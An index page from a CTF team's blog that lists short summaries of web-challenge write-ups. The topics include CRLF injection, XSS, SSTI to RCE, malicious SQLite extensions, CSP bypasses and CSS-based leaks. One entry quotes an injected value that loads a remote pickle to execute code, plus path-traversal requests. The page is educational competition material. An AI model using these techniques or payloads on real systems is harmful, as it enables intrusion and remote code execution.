bi0s
  •  Home
  •  Categories
  •  Archives
  •  Tags
  •  Home
  •  Categories
  •  Archives
  •  Tags

0_CSP - Securinets-Quals 2023

Lu513n
2023-08-07
Web

tl;dr

  • CRLF Injection in Headed Key in Werkzeug headers.set
  • Using CRLF Injection at /?user= to Get XSS at /helloworld
  • Make the admin visit /?user=<PAYLOAD> and /helloworld using cache poison or bug in regex(uninteded)
Read More
Securinets-Quals CRLF XSS Cache-Poison

Another Secure Store Note - LINE CTF 2023

ma1f0y
2023-03-28
Web

tl;dr

  • Leak csrf token bypassing document.domain
  • visiting /profile/ will not change the nonce
  • Leak nonce using dangling markup in firefox
  • Add XSS payload using the csrf to get the flag
Read More
LINECTF2023

valentine - hxpCTF 2022

sk4d
2023-03-15
Web

tl;dr

  • SSTI in the valentine card
  • bypass filter by setting ejs delimiter option
  • RCE :yay:
Read More
hxpCTF

sqlite_web - hxpCTF 2022

ma1f0y
2023-03-14
Web

tl;dr

  • Create a sqlite3 extension with rce payload.
  • Abuse werkzeug tempfile to upload the extension to server.
  • load that extension using load_extension(‘/proc/self/fd/fd_no’);
Read More
hxpCTF

scorescope - DiceCTF 2023

sk4d
2023-02-07
Web

tl;dr

  • read output using ValueError
  • sys.modules to print all the app modules
  • go through the module classes and find the test case functions and re-write them to always return true
Read More
DiceCTF2023

Recursive-csp - DiceCTF 2023

Lu513n
2023-02-07
Web

tl;dr

  • craft a payload with a random nonce
  • use hash-collider to collide the nonce we gave earlier
Read More
DiceCTF2023

Vuln-Drive 2 - bi0sCTF22

ma1f0y
2023-01-24
Web

tl;dr

  • SSRF using file_get_contents() and CRLF in ini_set()
  • basic Header quirks to bypass waf
  • sqli using column trick in SQLite to get the flag
Read More
SSRF CRLF SQLi bi0sCTF22

Emo-Locker - bi0sCTF 2022

Yadhu Krishna
2023-01-23
Web

tl;dr
- CSS injection using url forging
- leaking password using :empty selectors

Read More
XSLeaks CSS injection

PYCGI-bi0sCTF22

Yadhu Krishna M
2023-01-23
Web

tl;dr
-Get the docker-entrypoint.sh using /static../docker-entrypoint.sh
-Get the challenge files using /static../panda/cgi-bin/search_currency.py
-Host your exploit and use x‘|@pd.read_pickle(‘http://0.0.0.0:6334/output.exploit')|‘ to execute the exploit

Read More
RCE Panda nginx misconfiguration

NarutoKeeper - Securinets CTF Quals 2022

ma1f0y
2022-04-14
Web

tl;dr

  • Create a note with meta redirect tag to get callback.
  • Leak the flag using search functionality.
Read More
XSS CSP SecurinetsCTFQuals XS-Leak

 Previous 

2 / 3

 Next 

Official blog of team bi0s

  Projects
  •   bi0s-wargame
    (Unraveling)
  •   bi0s-wiki
    (Free Encyclopedia)
  •   InCTF
    (Nationals CTF)
  •   InCTFj
    (Juniors CTF)

Made With Love and Coffee



Blog content follows the Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0) License

Use Material X as theme, total visits times.